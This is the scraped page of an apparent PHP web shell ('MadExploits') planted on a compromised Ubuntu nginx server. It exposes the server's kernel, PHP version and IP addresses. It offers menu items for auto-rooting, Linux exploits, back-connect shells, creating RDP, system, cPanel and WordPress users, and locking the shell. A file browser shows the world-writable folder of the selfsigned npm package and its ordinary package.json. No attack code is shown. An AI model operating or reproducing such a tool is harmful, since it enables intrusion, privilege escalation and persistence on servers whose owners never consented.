Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
selfsigned /
[ HOME SHELL ]
Name
Size
Permission
Action
test
[ DIR ]
dr-xr-xr-x
.jshintrc
637
B
-rw-rw-rw-
LICENSE
1.05
KB
-rw-rw-rw-
README.md
8.55
KB
-rw-rw-rw-
index.d.ts
1.41
KB
-rw-rw-rw-
index.js
6.37
KB
-rw-rw-rw-
package.json
960
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "selfsigned", "version": "2.4.1", "description": "Generate self signed certificates private and public keys", "main": "index.js", "types": "index.d.ts", "scripts": { "test": "mocha -t 5000" }, "repository": { "type": "git", "url": "git://github.com/jfromaniello/selfsigned.git" }, "keywords": [ "openssl", "self", "signed", "certificates" ], "author": "José F. Romaniello <jfromaniello@gmail.com> (http://joseoncode.com)", "contributors": [ { "name": "Paolo Fragomeni", "email": "paolo@async.ly", "url": "http://async.ly" }, { "name": "Charles Bushong", "email": "bushong1@gmail.com", "url": "http://github.com/bushong1" } ], "license": "MIT", "dependencies": { "@types/node-forge": "^1.3.0", "node-forge": "^1" }, "devDependencies": { "chai": "^4.3.4", "mocha": "^9.1.1" }, "engines": { "node": ">=10" } }
Close